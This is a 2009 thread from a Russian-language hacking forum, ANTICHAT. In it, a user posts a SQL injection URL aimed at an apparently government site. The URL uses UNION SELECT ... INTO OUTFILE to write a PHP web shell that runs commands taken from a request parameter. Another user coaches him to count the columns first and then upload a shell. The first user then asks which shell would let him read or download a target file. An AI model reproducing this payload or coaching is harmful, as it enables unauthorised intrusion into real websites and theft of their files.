ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
19.08.2009, 23:14
|
|
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760
Репутация:
28
|
|
L I G A,
ты это миел ввиду?
_site.gov/main.php?cu=-1+union+select+null,null,'<? system($_GET['c']); ?>',null,null+INTO+OUTFILE+'../../../../*****/absolut/put`/k_www/shell.php'/*
|
|
|
19.08.2009, 23:34
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от serg-php
L I G A,
ты это миел ввиду?
_site.gov/main.php?cu=-1+union+select+null,null,'<? system($_GET['c']); ?>',null,null+INTO+OUTFILE+'../../../../*****/absolut/put`/k_www/shell.php'/*
я имел ввиду сначала подобрать количество полей,
в твоем запросе это количество "null'ов"
дальше будешь видеть что и как ,и мб сможешь залить простой шелл как ты продемонстрировал на своем примере.
и на будущее: для таких вопроов есть отдельная тема тыц
|
|
|
|
19.08.2009, 23:37
|
|
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760
Репутация:
28
|
|
и на будущее: для таких вопроов есть отдельная тема тыц
Буду знать!
|
|
|
|
19.08.2009, 23:38
|
|
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760
Репутация:
28
|
|
Кол-во полей в таблице известно - 14 я насчитал!
|
|
|
|
20.08.2009, 00:01
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от serg-php
Кол-во полей в таблице известно - 14 я насчитал!
что то я сомневаюсь,я б для начала посаветовал тебе не пожалеть время а сесть и прочитать замечательную статью
Dr.Z3r0 о SQL INJECTION в разделе "наши статьи",если оно тебе действительно надо,а не надеятся на кого то.
|
|
|
|
19.08.2009, 23:42
|
|
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760
Репутация:
28
|
|
Какой шелл посоветуете, чтобы прочесть искомый файл или слить его локально?
Последний раз редактировалось serg-php; 19.08.2009 в 23:47..
|
|
|
|
20.08.2009, 00:28
|
|
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760
Репутация:
28
|
|
Читаю, пробую применить примеры от http://forum.antichat.ru/thread43966.html
Видимо фильтруется!
|
|
|
|
21.08.2009, 16:26
|
|
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760
Репутация:
28
|
|
Очень сложно делать что-то впервый раз! Пытаюсь использовать изнания из статьи - не получается!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид